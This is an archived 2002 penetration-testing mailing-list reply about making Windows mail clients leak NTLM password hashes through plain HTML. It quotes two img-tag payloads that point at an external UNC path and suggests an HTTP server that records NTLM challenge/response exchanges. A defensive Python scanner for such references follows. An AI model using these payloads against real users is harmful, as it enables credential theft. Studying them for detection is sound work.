Penetration Testing mailing list archives
Re: Hijacking the hashes : multiple windows mail clients vulnerability
From: olle <olle () nxs se>
Date: Thu, 4 Jul 2002 14:45:13 +0200
On Wed, Jul 03, 2002 at 04:43:46PM -0000, overclocking_a_la_abuela () hotmail com wrote:
<snip>
So, what about if there was another method to force a user on a windows box to send you his hashes, without his knowledge, without using any interactive method, non javascript, non activeX, non some lame social engineering technique... only HTML ?
<snip>
1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img src="\\\\external_IP\\resource">.
As you say in your post, any good firewall/border router would stop this. You could try a normal http:// url to your apache server with a hacked up NTLM-authentication module that records the challenge/response fields in the SSP exchange... This would most likely bypass any firewall/proxy...

Never actually done this, but it might be fun to hack up some code similar to slingerbult[1] that just solicits an SSP challenge/response and returns a 1-pixel transparent gif or something... ;)

It would be fun if someone tried this out, I don't think I will have the urge to do it any time soon, but it's been on my mind for quite some time.

/olle
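A defender-side check for the two `<img>` forms quoted above, as an added example that is not part of the original post: it scans an HTML mail body for `src`/`background` attributes that name a UNC or `file://` host, which is what makes a Windows client open an SMB connection on render. The function names, the internal-range list and the sample body are assumptions constructed for illustration.

```python
import ipaddress
import re
from html.parser import HTMLParser

FETCH_ATTRS = {"src", "background"}  # loaded on render, no click needed
UNC_HOST = re.compile(r"^\\{2,}(?![A-Za-z]:\\)([^\\]+)\\")
# Assumed internal ranges; replace with the networks your site actually uses.
INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def smb_host(value):
    """Return the remote host a UNC or file:// reference names, else None."""
    v = value.strip()
    if v.lower().startswith("file:"):
        v = v[5:].replace("/", "\\")  # file://host/share == \\host\share
    m = UNC_HOST.match(v)
    if not m or m.group(1).lower() == "localhost":
        return None  # not UNC, or a local path such as file:///C:/...
    return m.group(1)

def is_external_ip(host):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname: resolve and classify it separately
    return not any(ip in net for net in INTERNAL)

class RemoteFileRefs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []  # (tag, attribute, host, external address literal?)
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            host = smb_host(value) if name in FETCH_ATTRS and value else None
            if host:
                self.hits.append((tag, name, host, is_external_ip(host)))

def scan_html(body):
    parser = RemoteFileRefs()
    parser.feed(body)
    parser.close()
    return parser.hits

# Constructed sample body; 203.0.113.7 is a documentation address.
SAMPLE = r'''<body background="file:///C:/bg.png">
<img src="file://\\\\203.0.113.7\\resource">
<img src="\\\\203.0.113.7\\resource">
<img src="\\fileserver\share\logo.gif">
<img src="http://www.example.com/pixel.gif"></body>'''
```

`scan_html(SAMPLE)` returns one tuple per flagged attribute; a mail gateway could quarantine or rewrite messages where the last field is true.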